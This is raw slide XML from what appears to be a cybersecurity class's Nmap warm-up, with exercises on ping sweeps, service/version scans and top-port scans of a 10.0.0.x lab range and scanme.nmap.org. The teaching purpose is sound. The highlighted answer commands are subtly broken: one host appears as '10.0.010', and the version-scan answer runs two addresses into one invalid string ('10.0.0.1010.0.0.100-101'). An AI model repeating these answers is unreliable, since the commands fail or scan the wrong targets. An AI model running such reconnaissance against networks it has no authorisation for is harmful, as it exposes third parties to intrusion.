                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>identified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> to actually exploit the target.</a:t>
            </a:r>
            <a:endParaRPr>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1" name="Shape 2071"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2072" name="Google Shape;2072;p10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073" name="Google Shape;2073;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74" name="Google Shape;2074;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5" name="Google Shape;2075;p10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Warm-Up Activity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Review</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will review Nmap using your local VM</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Instructions sent via Slack. </a:t>
            </a:r>
            <a:endParaRPr b="1"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sp>
        <p:nvSpPr>
          <p:cNvPr id="2080" name="Google Shape;2080;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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2081" name="Google Shape;2081;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Write an Nmap command to perform a ping sweep of the range 10.0.0.0 to 10.0.0.254.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2082" name="Google Shape;2082;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3" name="Google Shape;2083;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4" name="Google Shape;2084;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1378748"/>
            <a:ext cx="9144000" cy="8388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 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2085" name="Google Shape;2085;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="23535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Write an Nmap command to perform a service/version scan of the live hosts you discover. Save the results as an XML file to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/tmp/results.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2086" name="Google Shape;2086;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263" y="2854300"/>
            <a:ext cx="9144000" cy="10050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0" name="Shape 2090"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2091" name="Google Shape;2091;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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2092" name="Google Shape;2092;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Write an Nmap command to perform a ping sweep of the range 10.0.0.0 to 10.0.0.254.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2093" name="Google Shape;2093;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94" name="Google Shape;2094;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5" name="Google Shape;2095;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1452937"/>
            <a:ext cx="9144000" cy="764700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -sP 10.0.0.0-254. </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This reveals the hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.010, 10.0.0.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2096" name="Google Shape;2096;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="23535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Write an Nmap command to perform a service/version scan of the live hosts you discover. Save the results as an XML file to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/tmp/results.txt</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0" name="Shape 2100"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2101" name="Google Shape;2101;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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2102" name="Google Shape;2102;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Write an Nmap command to perform a ping sweep of the range 10.0.0.0 to 10.0.0.254.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2103" name="Google Shape;2103;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4" name="Google Shape;2104;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5" name="Google Shape;2105;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1452937"/>
            <a:ext cx="9144000" cy="764700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -sP 10.0.0.0-254. </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This reveals the hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.010, 10.0.0.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2106" name="Google Shape;2106;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="23535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Write an Nmap command to perform a service/version scan of the live hosts you discover. Save the results as an XML file to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/tmp/results.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2107" name="Google Shape;2107;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="3200600"/>
            <a:ext cx="9144000" cy="960000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Nmap -sV 10.0.0.1010.0.0.100-101 -oX /tmp/results.txt </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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1" name="Shape 2111"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2112" name="Google Shape;2112;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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2113" name="Google Shape;2113;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to scan the top 100 ports of the live hosts you discovered above. Save the results to an XML file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2114" name="Google Shape;2114;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5" name="Google Shape;2115;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6" name="Google Shape;2116;p111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1378748"/>
            <a:ext cx="9144000" cy="8388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 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2117" name="Google Shape;2117;p111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="235351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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>--top-ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to scan the top 20 ports of scanme.nmap.org. Save the results as a normal file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2118" name="Google Shape;2118;p111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263" y="2854300"/>
            <a:ext cx="9144000" cy="10050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